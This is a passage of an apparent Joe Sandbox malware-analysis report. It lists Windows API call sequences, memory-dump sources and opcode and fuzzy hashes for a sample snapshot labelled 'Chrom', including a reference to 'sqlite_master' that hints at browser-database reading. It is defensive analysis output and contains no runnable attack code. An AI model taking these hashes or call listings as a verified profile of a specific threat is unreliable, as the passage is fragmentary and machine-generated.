                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CreateFileGuidSystem_snwprintffreememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2968200804-0
                                                                                                                                                        • Opcode ID: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
                                                                                                                                                        • Instruction ID: 25fc22cfe4b5cde183837428320e4c1379d013834ecb010c5ec9b74078343e2e
                                                                                                                                                        • Opcode Fuzzy Hash: 2f9ba14a2f8dc736bd715059495414ae64c87d84619f28dbac8dd1c6da2f391f
                                                                                                                                                        • Instruction Fuzzy Hash: 6E317A72D00619ABCF01EF55C8809DEB7B8AF88314F164276EC14FB241E738AE558BE5
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00411BA4
                                                                                                                                                          • Part of subcall function 0040A6D5: ShellExecuteW.SHELL32(?,open,?,0044F4CC,0044F4CC,00000005), ref: 0040A6EB
                                                                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 00411C14
                                                                                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 00411C2E
                                                                                                                                                        • GetKeyState.USER32(00000010), ref: 00411C5A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3550944819-0
                                                                                                                                                        • Opcode ID: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
                                                                                                                                                        • Instruction ID: ebbdbb9de51bfb825555d7e990b9e0e06ff93dbce945c066a165325672d84fca
                                                                                                                                                        • Opcode Fuzzy Hash: 110857cfc2ea4ecf3d2e2f0a099ce967012f78d6f618a689b674ba793c676c63
                                                                                                                                                        • Instruction Fuzzy Hash: 1241D030640305DFDB309F25C888B9673B4AB50329F10857AEA699B2E2D778AD85CB58
                                                                                                                                                        APIs
                                                                                                                                                        • free.MSVCRT ref: 0040F09A
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000001,+>@,00000000,00001E38,?,?,?,00403E2B), ref: 0040F0AC
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F0DF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$free
                                                                                                                                                        • String ID: +>@
                                                                                                                                                        • API String ID: 2888793982-4232063742
                                                                                                                                                        • Opcode ID: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
                                                                                                                                                        • Instruction ID: a4b117dcc49df0d4677d1a1554444a6f58dddbe622eac26ef29304aa8a98fb1c
                                                                                                                                                        • Opcode Fuzzy Hash: 80fa03900417df2a92a9176d47486ea1bc487edf58bdf5f2f086700b407fb3cc
                                                                                                                                                        • Instruction Fuzzy Hash: 25219030A00605EFCB20EF29CA4185ABBF6FF44314720467EE852E3B92E735EE519B55
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 0041251C
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 00412546
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000013,00000001,0044F98C,?,?,00412D17,?,0044F98C), ref: 0041256A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3510742995-2766056989
                                                                                                                                                        • Opcode ID: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
                                                                                                                                                        • Instruction ID: e394cabee66379c814482ce599a1792370699005e64803ab7b2efeceeecbd966
                                                                                                                                                        • Opcode Fuzzy Hash: 1a8ca5cada9ad0e9eb845eafeefd174272e9607b940f064bebe2dc7a1e42d05d
                                                                                                                                                        • Instruction Fuzzy Hash: B9113BB25003047FCB289F25D9C0CAA77AAFF50344701062EF906C6252E674DFA586E9
                                                                                                                                                        APIs
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401C27,?,?,?,?,00458788,0000000C), ref: 0040B52D
                                                                                                                                                        • memset.MSVCRT ref: 0040B53E
                                                                                                                                                        • memcpy.MSVCRT(0045B474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401C27,?,?,?,?,00458788,0000000C), ref: 0040B54A
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1865533344-0
                                                                                                                                                        • Opcode ID: f0960726fd40cdc9ae45f90f762857dd8f0b7d200d88f073f2e85c6963b5fa7f
                                                                                                                                                        • Instruction ID: aafbb257eb0cb79d1a62da41bbc700b7fe6572c6948dd35e3e17e6ab681315f4
                                                                                                                                                        • Opcode Fuzzy Hash: f0960726fd40cdc9ae45f90f762857dd8f0b7d200d88f073f2e85c6963b5fa7f
                                                                                                                                                        • Instruction Fuzzy Hash: 16118C71604601AFD328DF1DC891E26F7E5EFD9304B25892EE49A97381DB35E801CB68
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004163BB
                                                                                                                                                          • Part of subcall function 0040A912: _snwprintf.MSVCRT ref: 0040A957
                                                                                                                                                          • Part of subcall function 0040A912: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A967
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004163E4
                                                                                                                                                        • memset.MSVCRT ref: 004163EE
                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,0044F4CC,?,00002000,?), ref: 00416410
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1127616056-0
                                                                                                                                                        • Opcode ID: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
                                                                                                                                                        • Instruction ID: f3ab12530ca15f18597a66c6933a9b69f611745656a43028b292f8596be22397
                                                                                                                                                        • Opcode Fuzzy Hash: fd369af08461e68e8af29ce9eb542014cb5cfd53075e89779255da270f569b26
                                                                                                                                                        • Instruction Fuzzy Hash: 7C118EB2600219AFDF11AF65EC02EDE3B69EF05704F11006AFB05F2061E6359E648BAD
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 00416D00
                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00416D32
                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00416D46
                                                                                                                                                        • wcscpy.MSVCRT ref: 00416D59
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3917621476-0
                                                                                                                                                        • Opcode ID: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
                                                                                                                                                        • Instruction ID: e53360a3a95c928778c5eecace91b7a860d411a781c8edf1bb59ff18ee2a4c16
                                                                                                                                                        • Opcode Fuzzy Hash: 6a246380b1c5f8880238d42239ebf0d3dc96a60f32716ef5ab3fc8f08e63b26a
                                                                                                                                                        • Instruction Fuzzy Hash: AC11EC75A00208AFDB10DFA5D9889EEB7F8FB49304F10446AE505E7200DB38DB45CB65
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 00431DCA
                                                                                                                                                        • memset.MSVCRT ref: 00431DD4
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,00000000,?,00000000,00000068,?,?,00000068), ref: 00431DFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID: sqlite_master
                                                                                                                                                        • API String ID: 438689982-3163232059
                                                                                                                                                        • Opcode ID: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
                                                                                                                                                        • Instruction ID: 9f101942a68db4e790d7b6a69b6e003f8a3c489338379646b69a5518e9817596
                                                                                                                                                        • Opcode Fuzzy Hash: 50ce9bdbcbbafd13e081e20970f75e6f660356cc808d36c36f9c0c11973c8031
                                                                                                                                                        • Instruction Fuzzy Hash: E101B972944218BAEB11BBA18C42FDEB77DFF04318F10055AF50062042D73AA615C7A5
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
                                                                                                                                                          • Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
                                                                                                                                                          • Part of subcall function 0040D5E2: memcpy.MSVCRT(00000000,00000002), ref: 0040D6FA
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00410B28
                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00410B8D
                                                                                                                                                          • Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
                                                                                                                                                          • Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
                                                                                                                                                          • Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00410B53
                                                                                                                                                        • wcscat.MSVCRT ref: 00410B66
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
• Instruction ID: d8a36cc9ebfe16c4016e2f7d8ce927a21bbfbb5a34db6cd482cb30cff4dedb25
• Opcode Fuzzy Hash: 0e6b7667e56475d7b9f4e87a61fadb8ecb0fd6bc9a92603bad5de248469984c0
• Instruction Fuzzy Hash: F40188B190030866F720F7B5CC86FEB73AC9B4070DF14446AB719E2183D679A9554A6D
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,004194B6,?), ref: 004193A9
• malloc.MSVCRT ref: 004193B0
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,004194B6,?), ref: 004193CF
• free.MSVCRT ref: 004193D6
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
• Instruction ID: ffb41da00ab2b38d2186f0124ec64ac670dece32c0042acda28ef17f3fef3975
• Opcode Fuzzy Hash: 7272131d04c6d774e786cc75aec82cebd7b04aebb3355190285584dbadfac89e
• Instruction Fuzzy Hash: BBF0B4B260D21E7F7A102A655CC0C7BBB9CD68A2FCB20073FF520911C0D9555C0156B5
APIs
• GetDlgItem.USER32(?,?), ref: 0040A0FF
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 0040A117
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 0040A12D
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 0040A150
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
• Instruction ID: 6ff75ca8442cb1aaba57c9855211930760e6665974d32c71f4c26f3b37502511
• Opcode Fuzzy Hash: 23c7d58ea5e9d2a7b917a314186be0afa9840c28c7dffcbe9a9049126b0066b5
• Instruction Fuzzy Hash: A3F06975A0020CBEDB018F958CC1CBFBBB9EB49784F20407AF504EA150D270AE11AB61
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00411F50
• RegisterClassW.USER32(00000001), ref: 00411F75
• GetModuleHandleW.KERNEL32(00000000), ref: 00411F7C
• CreateWindowExW.USER32(00000000,00000000,0044F4CC,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00411FA2
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
• Opcode ID: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
• Instruction ID: 99e030ddf9f13c5852d1981898f16885884db78983a3d6c06d17877ae79c9dc0
• Opcode Fuzzy Hash: b5bbf0ae051fe51f02939c0630202113e2a9289baae73011afc51dd1c0ebc6e3
• Instruction Fuzzy Hash: 350125B1901229ABD7109FA59C89ADFBFBCFF09710F10422AF108A2240D7B45A448BE8
APIs
• memset.MSVCRT ref: 00419AD2
• UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00419AF2
• LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00419AFE
• GetLastError.KERNEL32 ref: 00419B0C
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: File$ErrorLastLockUnlockmemset
• String ID:
• API String ID: 3727323765-0
• Opcode ID: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
• Instruction ID: f326d1aa279b3286dc61effd62df9caa1a27d224ff9dba1ebef161e5ee26a254
• Opcode Fuzzy Hash: 986a2fee5f05a16e76f0cef6e54be21541a9d0a22b66a179d935c389a5993231
• Instruction Fuzzy Hash: 5F01D175504208FFDB21DFA4EC84C9B77B8FB81754F20443AF502D5050E634AD48CB65
APIs
• memset.MSVCRT ref: 0040F21B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044F684,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F234
• strlen.MSVCRT ref: 0040F246
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F257
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
• Instruction ID: 693f9c66229169b877fb65a07178d670502057314d81cba2c0b658d4e4f309f7
• Opcode Fuzzy Hash: af324034355b8326fc79afd52d6166ba087be1d4dfb2b911d4ab16e42422411b
• Instruction Fuzzy Hash: B8F04FB680121CBEFB01A7949CC5DEB776CDB05254F0040B2B705D2042E5749E488B78
APIs
• memset.MSVCRT ref: 0040F1AC
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F1C9
• strlen.MSVCRT ref: 0040F1DB
• WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F1EC
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
• Instruction ID: 214f2a4103aa1d7c130f25418be1d7ef950c2207e9cb189a5e29a9696e3271f8
• Opcode Fuzzy Hash: b6fc7f5051e315d886dd0844a980d33df026f7d5ca875cb3320374fcca0aa7ef
• Instruction Fuzzy Hash: B0F062B680111CBEEB81A794DC81DEB77ACEB05258F0180B2B749D2041E9749F4C4F7D
APIs
• memset.MSVCRT ref: 00403774
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403791
• strlen.MSVCRT ref: 004037A3
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004037B4
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• API String ID: 2754987064-0
• Opcode ID: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
• Instruction ID: 1ce7aa51f862e36c5a0d70db4a972110d182e6fdccd903b3ebab4b2d8822c945
• Opcode Fuzzy Hash: 3a8f2ef2901fd1bf96b16f805e9566abfadfd8793c1561c94dc77c8a8d5e4b08
• Instruction Fuzzy Hash: C6F062B780121CBEFB01A794DCC5DEB776CDB05254F0040B2B705D2042E5749F488B79
APIs
  • Part of subcall function 0040A33E: memset.MSVCRT ref: 0040A35D
  • Part of subcall function 0040A33E: GetClassNameW.USER32(?,00000000,000000FF), ref: 0040A374
  • Part of subcall function 0040A33E: _wcsicmp.MSVCRT ref: 0040A386
• SetBkMode.GDI32(?,00000001), ref: 00415DEF
• SetBkColor.GDI32(?,00FFFFFF), ref: 00415DFD
• SetTextColor.GDI32(?,00C00000), ref: 00415E0B
• GetStockObject.GDI32(00000000), ref: 00415E13
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
